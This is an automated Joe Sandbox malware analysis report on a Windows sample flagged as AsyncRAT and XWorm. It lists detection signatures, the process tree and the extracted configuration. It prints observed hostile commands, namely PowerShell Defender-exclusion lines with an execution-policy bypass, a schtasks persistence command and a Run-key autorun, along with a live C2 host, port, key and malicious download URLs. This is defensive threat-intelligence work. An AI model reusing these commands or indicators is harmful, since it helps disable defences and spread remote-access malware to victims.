Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sDKRz09zM7.exe

Overview

General Information

Sample name:sDKRz09zM7.exe
renamed because original name is a hash value
Original sample name:51edcfc381c90d4b6408aa58f991b14d7d7d57a3597550ecc63c663ebfd095d2.exe
Analysis ID:1566238
MD5:6c06275582db133a429e4149c0f1ac21
SHA1:44c91c923711ed57cafbdd235fb4d1eac8a02a57
SHA256:51edcfc381c90d4b6408aa58f991b14d7d7d57a3597550ecc63c663ebfd095d2
Tags:exeuser-Chainskilabs
Infos:

Detection

AsyncRAT, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected Powershell download and execute
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • sDKRz09zM7.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\sDKRz09zM7.exe" MD5: 6C06275582DB133A429E4149C0F1AC21)
    • not rat.exe (PID: 7400 cmdline: "C:\Users\user\AppData\Roaming\not rat.exe" MD5: 270675071F6FA1DFAA122B58BC45D9AB)
      • powershell.exe (PID: 7628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'not rat.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1148 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3428 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 3456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BootstrapperV1.23_ModdedByHisako.exe (PID: 7424 cmdline: "C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe" MD5: EDBE7F367BE35F4D0702F81FC432C9EC)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 8092 cmdline: C:\Windows\system32\WerFault.exe -u -p 7424 -s 2180 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 8016 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 8060 cmdline: C:\Windows\system32\WerFault.exe -pss -s 444 -p 7424 -ip 7424 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7028 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7640 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 270675071F6FA1DFAA122B58BC45D9AB)
  • svchost.exe (PID: 7732 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 270675071F6FA1DFAA122B58BC45D9AB)
  • svchost.exe (PID: 5636 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 270675071F6FA1DFAA122B58BC45D9AB)
  • svchost.exe (PID: 7060 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 270675071F6FA1DFAA122B58BC45D9AB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["award-adware.gl.at.ply.gg"], "Port": 8848, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
\Device\ConDrvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Roaming\svchost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x839e:$s6: VirtualBox
          • 0x82fc:$s8: Win32_ComputerSystem
          • 0x8d64:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x8e01:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x8f16:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x89dc:$cnc4: POST / HTTP/1.1
          Click to see the 4 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x20eee:$s6: VirtualBox
                • 0x2b52e:$s6: VirtualBox
                • 0x20e4c:$s8: Win32_ComputerSystem
                • 0x2b48c:$s8: Win32_ComputerSystem
                • 0x218b4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x2bef4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x21951:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x2bf91:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x21a66:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x2c0a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x2152c:$cnc4: POST / HTTP/1.1
                • 0x2bb6c:$cnc4: POST / HTTP/1.1
                00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  Click to see the 6 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  2.0.not rat.exe.df0000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                    2.0.not rat.exe.df0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      2.0.not rat.exe.df0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                        2.0.not rat.exe.df0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                        • 0x839e:$s6: VirtualBox
                        • 0x82fc:$s8: Win32_ComputerSystem
                        • 0x8d64:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                        • 0x8e01:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                        • 0x8f16:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                        • 0x89dc:$cnc4: POST / HTTP/1.1
                        0.2.sDKRz09zM7.exe.3059b50.1.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                          Click to see the 13 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Files With System Process Name In Unsuspected Locations
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\not rat.exe, ProcessId: 7400, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\not rat.exe" , ParentImage: C:\Users\user\AppData\Roaming\not rat.exe, ParentProcessId: 7400, ParentProcessName: not rat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', ProcessId: 7628, ProcessName: powershell.exe
                          Sigma detected: Suspect Svchost Activity
                          Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7640, ProcessName: svchost.exe
                          Sigma detected: System File Execution Location Anomaly
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7640, ProcessName: svchost.exe
                          Sigma detected: Change PowerShell Policies to an Insecure Level
                          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\not rat.exe" , ParentImage: C:\Users\user\AppData\Roaming\not rat.exe, ParentProcessId: 7400, ParentProcessName: not rat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', ProcessId: 7628, ProcessName: powershell.exe
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\not rat.exe, ProcessId: 7400, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                          Sigma detected: Powershell Defender Exclusion
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\not rat.exe" , ParentImage: C:\Users\user\AppData\Roaming\not rat.exe, ParentProcessId: 7400, ParentProcessName: not rat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', ProcessId: 7628, ProcessName: powershell.exe
                          Sigma detected: Startup Folder File Write
                          Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\not rat.exe, ProcessId: 7400, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                          Sigma detected: Suspicious Add Scheduled Task Parent
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\not rat.exe" , ParentImage: C:\Users\user\AppData\Roaming\not rat.exe, ParentProcessId: 7400, ParentProcessName: not rat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 3428, ProcessName: schtasks.exe
                          Sigma detected: Suspicious Schtasks From Env Var Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\not rat.exe" , ParentImage: C:\Users\user\AppData\Roaming\not rat.exe, ParentProcessId: 7400, ParentProcessName: not rat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 3428, ProcessName: schtasks.exe
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\not rat.exe" , ParentImage: C:\Users\user\AppData\Roaming\not rat.exe, ParentProcessId: 7400, ParentProcessName: not rat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe', ProcessId: 7628, ProcessName: powershell.exe
                          Sigma detected: Windows Processes Suspicious Parent Directory
                          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 8016, ProcessName: svchost.exe

                          Persistence and Installation Behavior

                          barindex
                          Sigma detected: Schedule system process
                          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\not rat.exe" , ParentImage: C:\Users\user\AppData\Roaming\not rat.exe, ParentProcessId: 7400, ParentProcessName: not rat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 3428, ProcessName: schtasks.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-01T20:08:04.943707+010028033053Unknown Traffic192.168.2.849709104.21.93.27443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-01T20:09:33.366446+010028559241Malware Command and Control Activity Detected192.168.2.849720147.185.221.248848TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: sDKRz09zM7.exeAvira: detected
                          Antivirus detection for URL or domain
                          Source: award-adware.gl.at.ply.ggAvira URL Cloud: Label: malware
                          Source: https://8049c006.solaraweb-alj.pages.dev/download/static/files/SolaAvira URL Cloud: Label: malware
                          Source: https://8049c006.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zipAvira URL Cloud: Label: malware
                          Source: https://8049c006.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exeAvira URL Cloud: Label: malware
                          Source: https://8049c006.solaraweb-alj.pages.dev/download/static/files/SolaoAvira URL Cloud: Label: malware
                          Antivirus detection for dropped file
                          Source: C:\Users\user\AppData\Roaming\not rat.exeAvira: detection malicious, Label: TR/Spy.Gen
                          Source: C:\Users\user\AppData\Roaming\svchost.exeAvira: detection malicious, Label: TR/Spy.Gen
                          Found malware configuration
                          Source: 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["award-adware.gl.at.ply.gg"], "Port": 8848, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeReversingLabs: Detection: 75%
                          Source: C:\Users\user\AppData\Roaming\not rat.exeReversingLabs: Detection: 91%
                          Source: C:\Users\user\AppData\Roaming\svchost.exeReversingLabs: Detection: 91%
                          Multi AV Scanner detection for submitted file
                          Source: sDKRz09zM7.exeReversingLabs: Detection: 65%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Roaming\not rat.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Roaming\svchost.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: sDKRz09zM7.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpackString decryptor: award-adware.gl.at.ply.gg
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpackString decryptor: 8848
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpackString decryptor: <123456789>
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpackString decryptor: <Xwormmm>
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpackString decryptor: XWorm V5.2
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpackString decryptor: USB.exe
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpackString decryptor: %AppData%
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpackString decryptor: svchost.exe
                          Source: sDKRz09zM7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49706 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49709 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 128.116.119.3:443 -> 192.168.2.8:49710 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.20.22.46:443 -> 192.168.2.8:49711 version: TLS 1.2
                          Source: sDKRz09zM7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: System.Runtime.Serialization.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.ni.pdbRSDS source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.PDB source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1712971481.0000022EE42B8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBD0C000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Configuration.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.ni.pdbRSDSC source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.pdb source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBD0C000.00000004.00000800.00020000.00000000.sdmp, WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.pdbH source: WER61AC.tmp.dmp.12.dr
